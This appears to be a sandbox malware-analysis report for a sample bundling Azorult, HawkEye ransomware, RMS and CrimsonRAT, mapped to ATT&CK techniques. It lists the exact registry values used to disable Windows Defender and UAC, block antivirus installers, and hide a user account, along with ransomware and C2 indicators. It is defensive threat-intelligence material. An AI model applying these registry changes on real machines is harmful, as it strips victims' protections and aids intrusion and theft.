azorult | hxxp://SEX[.]COM

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult.exe

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UAC bypass 3 TTPs 2 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
5284	net.exe
2396	net1.exe

Renames multiple (3249) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult.exe
Key created	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult.exe

Downloads MZ/PE file 4 IoCs

flow	pid	Process
176	3140	msedge.exe
176	3140	msedge.exe
176	3140	msedge.exe
176	3140	msedge.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\rteth.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult.exe

Modifies Windows Firewall 2 TTPs 22 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
2380	netsh.exe
3856	netsh.exe
2012	netsh.exe
1484	netsh.exe
3616	netsh.exe
5072	netsh.exe
4120	netsh.exe
5004	netsh.exe
5892	netsh.exe
5996	netsh.exe
5560	netsh.exe
2696	netsh.exe
180	netsh.exe
5276	netsh.exe
2208	netsh.exe
4032	netsh.exe
1420	netsh.exe
4292	netsh.exe
1952	netsh.exe
2804	netsh.exe
5000	netsh.exe
5412	netsh.exe

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
4292	icacls.exe
4032	icacls.exe
620	icacls.exe
4876	icacls.exe
5280	icacls.exe
4456	icacls.exe
5592	icacls.exe
1064	icacls.exe
4780	icacls.exe
724	icacls.exe
6000	icacls.exe
5940	icacls.exe
5556	icacls.exe
4852	icacls.exe
2012	icacls.exe
3092	icacls.exe
3292	icacls.exe
5964	icacls.exe
620	icacls.exe
6088	icacls.exe
4676	icacls.exe
3768	icacls.exe
5048	icacls.exe
4892	icacls.exe
1484	icacls.exe
5976	icacls.exe
5336	icacls.exe
4712	icacls.exe
4152	icacls.exe
920	icacls.exe
3536	icacls.exe
760	icacls.exe
5632	icacls.exe
4644	icacls.exe
2088	icacls.exe
548	icacls.exe
3148	icacls.exe
4988	icacls.exe
2616	icacls.exe
1456	icacls.exe
6088	icacls.exe
164	icacls.exe
2208	icacls.exe
720	icacls.exe
5536	icacls.exe
1528	icacls.exe
1572	icacls.exe
1636	icacls.exe
1676	icacls.exe
4912	icacls.exe
5400	icacls.exe
900	icacls.exe
5412	icacls.exe
4112	icacls.exe
5260	icacls.exe
3332	icacls.exe
4852	takeown.exe
1624	icacls.exe
5048	icacls.exe
760	icacls.exe
4436	icacls.exe
4628	icacls.exe
512	icacls.exe
3092	icacls.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
412	attrib.exe
4456	attrib.exe
2372	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	Azorult.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	winlog.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4174397412-4125106315-2776226590-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 33 IoCs

pid	Process
5872	HawkEye.exe
5192	HawkEye.exe
848	HawkEye.exe
2012	HawkEye.exe
5180	HawkEye.exe
5152	HawkEye.exe
384	Azorult.exe
4624	Azorult.exe
3304	wini.exe
2396	winit.exe
3268	cheat.exe
3836	taskhost.exe
116	P.exe
164	ink.exe
6000	rutserv.exe
972	rutserv.exe
1152	rutserv.exe
1148	rutserv.exe
2508	rfusclient.exe
2552	rfusclient.exe
516	R8.exe
4340	winlog.exe
224	winlogon.exe
4684	rfusclient.exe
5528	Rar.exe
3500	taskhostw.exe
5268	RDPWInst.exe
1588	RDPWInst.exe
3332	taskhostw.exe
4540	CrimsonRAT.exe
1880	CrimsonRAT.exe
5272	CrimsonRAT.exe
5880	taskhostw.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4852	takeown.exe
4644	icacls.exe
3292	icacls.exe
4676	icacls.exe
2012	icacls.exe
4912	icacls.exe
5592	icacls.exe
5556	icacls.exe
5048	icacls.exe
724	icacls.exe
4436	icacls.exe
4892	icacls.exe
3536	icacls.exe
2088	icacls.exe
4852	icacls.exe
6000	icacls.exe
4152	icacls.exe
2616	icacls.exe
5976	icacls.exe
164	icacls.exe
4876	icacls.exe
4780	icacls.exe
900	icacls.exe
1624	icacls.exe
5280	icacls.exe
620	icacls.exe
4112	icacls.exe
3148	icacls.exe
1676	icacls.exe
920	icacls.exe
512	icacls.exe
2208	icacls.exe
1456	icacls.exe
548	icacls.exe
720	icacls.exe
5536	icacls.exe
1572	icacls.exe
6088	icacls.exe
5048	icacls.exe
6088	icacls.exe
3092	icacls.exe
5400	icacls.exe
5964	icacls.exe
4712	icacls.exe
5632	icacls.exe
5260	icacls.exe
620	icacls.exe
3768	icacls.exe
4032	icacls.exe
4456	icacls.exe
5336	icacls.exe
5412	icacls.exe
1064	icacls.exe
4988	icacls.exe
5940	icacls.exe
760	icacls.exe
4628	icacls.exe
760	icacls.exe
4292	icacls.exe
3092	icacls.exe
1484	icacls.exe
3332	icacls.exe
1528	icacls.exe
1636	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe

Drops desktop.ini file(s) 27 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	HawkEye.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	HawkEye.exe
File opened for modification	C:\Program Files\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	HawkEye.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	HawkEye.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
174	raw.githubusercontent.com
175	raw.githubusercontent.com
176	raw.githubusercontent.com
259	iplogger.org
260	iplogger.org

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
227	bot.whatismyipaddress.com

Modifies WinLogon 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe

Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0005000000016fcc-2391.dat	autoit_exe
behavioral1/files/0x0007000000024125-10404.dat	autoit_exe
behavioral1/files/0x000700000002412d-10428.dat	autoit_exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\u1u3f5.exe	cmd.exe

Hide Artifacts: Hidden Users 1 TTPs 3 IoCs

persistence privilege_escalation

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0008000000024143-10552.dat	upx
behavioral1/memory/224-10555-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/224-10564-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchSquare150x150Logo.scale-100_contrast-white.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\DeleteToastQuickAction.scale-80.png	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2020.1906.55.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.contrast-white_scale-200.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-black_scale-200.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNewNoteWideTile.scale-100.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-white_devicefamily-colorfulunplated.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailLargeTile.scale-100.png	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-default.svg	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-150.png	HawkEye.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\YOUR_FILES_ARE_ENCRYPTED.HTML	HawkEye.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\YOUR_FILES_ARE_ENCRYPTED.HTML	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\ui-strings.js	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.altform-unplated_targetsize-32.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-125.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-cn_get.svg	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-64_contrast-black.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\LargeLogo.scale-100_contrast-white.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-black\WideTile.scale-100.png	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_unselected_18.svg	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\ui-strings.js	HawkEye.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\README.txt	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Images\canvas_light.jpg	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-48_altform-fullcolor.png	HawkEye.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\YOUR_FILES_ARE_ENCRYPTED.HTML	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\StopwatchWideTile.contrast-black_scale-100.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\LinkedInboxBadge.scale-400.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-16_altform-unplated_contrast-white.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreWideTile.scale-100.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_2.34.28001.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GameBar_LargeTile.scale-100.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-100_contrast-white.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\ThirdPartyNotices\ThirdPartyNotices.html	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-80_contrast-white.png	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\ui-strings.js	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\8041_40x40x32.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\LargeTile.scale-200_contrast-black.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxBadge.scale-400.png	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover_2x.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\4.jpg	HawkEye.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\YOUR_FILES_ARE_ENCRYPTED.HTML	HawkEye.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\YOUR_FILES_ARE_ENCRYPTED.HTML	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-black\SmallTile.scale-125.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-200_contrast-high.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-20_altform-unplated_contrast-white.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\MedTile.scale-200.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-96.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppxManifest.xml	HawkEye.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\ui-strings.js	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-40_contrast-white.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100_contrast-white.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-96_contrast-high.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-100_contrast-black.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-200.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\skype-to-phone-small.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\sending.gif	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlFrontIndicator.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\bg4.jpg	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2018.826.98.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSplashScreen.contrast-black_scale-125.png	HawkEye.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSmallTile.scale-100.png	HawkEye.exe
